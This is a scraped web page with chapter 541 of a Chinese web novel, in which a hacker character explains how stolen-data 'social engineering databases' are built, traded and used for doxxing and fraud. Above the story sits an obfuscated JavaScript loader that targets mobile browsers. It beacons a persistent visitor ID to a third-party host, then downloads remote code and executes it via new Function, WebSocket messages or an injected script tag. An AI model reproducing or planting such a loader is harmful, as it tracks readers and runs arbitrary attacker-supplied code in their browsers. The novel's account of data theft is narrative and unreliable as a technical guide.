第541章 我是除恶扬善(第1页)
function OVHGxRJ(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YTrZu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OVHGxRJ(t);};window[''+'a'+'L'+'e'+'X'+'U'+'l'+'s'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=YTrZu,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://yh.dyuthic.com:7891/stats/7728/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHR0cHHMlM0ElMkYlMkZ0by5tb2xpMTAyLnRvcCUzQTg4OTE=','d3NzJTNBJTJGJTJGdW0uYmNlbbnJzbby5jbb20lM0E5NTM1','4674',window,document,['H','b']);}:function(){};
第541章
如果不是自己遇到了这种事,如果不是认识西北风这个业内人士,陈勃怕是很难在短时间内知道还有这么一个行当。
随着西北风的讲解,陈勃算是知道了这个叫社工库的东西是个什么玩意了。
黑客通常会入侵自己觉得有价值的网络站点,再将这个网站中所有的用户资料和信息全部盗走。
但因为网站中所储存的用户信息实在是太多,因此必须将这些信息收集起来,集中存放,以便之后查找。
而这个被黑客用来存放信息的地方就是社工库。
在黑客收取了大量用户信息后,便将其存放在社工库进行整理分类,根据不同的用途分为不同的种类。
黑客们只需要登录自己提前设置好的社工库网站,就能进入社工库里查询到自己想要的信息,当然也并不是只有黑客能这么做,只要这个网站一直存在着,那就算是普通人,也能通过输入别人的常见信息(如手机号码,qq号)来查询到其他更隐私的资料。
像现在陈勃和陈小颜被人肉搜索后所曝出来的家庭情况,社会经历等等其实都是通过社工库查询出来的。
“你是不是也干过这种事?”陈勃问道。
“我那都是正当用途,除恶扬善,而且我也是买的信息,这可不能说出去……”
陈勃很是无语,但是面对这样的情况,又是无可奈何。
只能听西北风继续讲下去。
“这里面有几个行业术语,第一个是拖库,意思是黑客入侵有价值的网站,盗走数据库,再一个是洗库,意思是清洗数据,将有价值的数据进行变现交易,第三个就撞库,就是拿得到的数据在其他网站或者是a上进行登陆尝试,最后一个就是社工库了,这里面很复杂的……”
根据西北风的说法,这些数据的来源也很复杂,一个是黑客编程序盗取数据,第二个就是家贼难防。
一个是黑客会在许多网站内投放木马病毒,通过爬虫获取这些网站的注册用户自己填写的资料,其中包括家庭住址,年龄性别,联系方式等等,一旦获取成功就会被黑客放在社工库里,等待有需要的人将其买走。
第二个数据来源就比较可恶了,各大网站的内部员工。俗话说的好啊,“日防夜防,家贼难防。”所以很多网站对自己的内部员工是并不设防的。
这些在网站内部工作的员工自然就能轻松获取用户的资料,有相当一部分员工会为了获取违法利益,将自己所了解的这些网站的用户隐私信息售卖给掌控社工库的违法人员。
这种内部员工掌握的用户资料通常会比黑客还要全面,毕竟黑客还得靠编写各种代码才能进入网站内部获取信息,被发现的概率也不小,但这些员工却不会引起公司的怀疑,因此在社工库内部存储的用户隐私信息中,有相当一部分都是各大网站的内部人员自己售卖出去的。
这些被员工和黑客所窃取到的用户信息囊括了很多方面,涉及到的内容取决于用户注册过什么软件或者网站。
那么为什么黑客会建立这样一个社工库呢?原因很简单,有需求,能赚钱。
毕竟有需求就会有供应链,有人想要通过非法手段来得到他人的信息,就一定会有人满足他们的这个想法。
而黑客就是满足他们这个想法的,但黑客们也不是什么慈善家。
所以如果有人想要从社工库里得到他人信息,就必须要给这些社工组织付费。而这就是建立社工库组织的收入来源之一。
另一个收入来源则是被社工库大量出售的普通用户数据。前面所说的那种收入的前提是被查询人本身的信息很有价值,所以才会让人愿意花钱上社工库去查隐私资料。
那其他被社工库收集来的普通民众的资料该怎么处理呢?毕竟这年头愿意花钱上网查别人资料的人还是在少数。不过社工库组织还是为这些普通用户的信息找到了买家,而他们就是臭名昭著的网络诈骗公司。
相信大家一直很疑惑吧,明明自己好像没有将自己的电话号码和个人资料胡乱发在网上或者公布出去,但却总能接到各种网络诈骗的电话,还能将自己的个人资料说的头头是道,好像比你爸妈还了解你。
事实上,他们可能真的很了解你,当然,除了诈骗公司外,不少金融公司和房地产公司也统统都是社工库的买家之一。不过他们购买大量的用户信息并不是为了打诈骗电话,而是想要收集这些数据对用户精准定位。
这些普通用户信息在社工库里时便已经按照所获取的资料进行了分类处理,比如按照家庭状况,婚姻状况以及财务管理的不同分成不同的人群。
一旦被金融公司或者房地产公司获取到这大量的数据,那么他们就会根据这些分类精准的给用户推荐所需要的服务。比如知道了用户的家庭状况,那么金融行业的保险公司就能精准的为用户推荐所需要的保险,例如人身意外险,重大疾病险,甚至是车险。
对于房地产行业来说也是一样的,如果知道了用户的婚姻状况和财务情况,就能判断对方是否需要买房,装修等等,从而对用户的需求精准推荐。
“你是不是认识掌握社工库的人?”陈勃最后这句话把西北风吓了一跳。
“也不能说是认识,就是工作需要嘛,所以有联系也是正常的,对吧?”
“帮我找一个这样的人,我想见见你交易的这个人,没别的意思,我就是想学一点他们的爬虫技术,编程啥的……”陈勃说道。
西北风一阵错愕,半天才讪讪的说道:“你这话,谁信啊,不是想让我把人骗出来然后……”
“我又不是警察,你不用担心这个,再说了,抓这一个有用吗,我是真的想学点东西,尽快给网鲨放肉吧,我去打个电话,让我爸妈他们出去躲几天……”陈勃说完就离开了。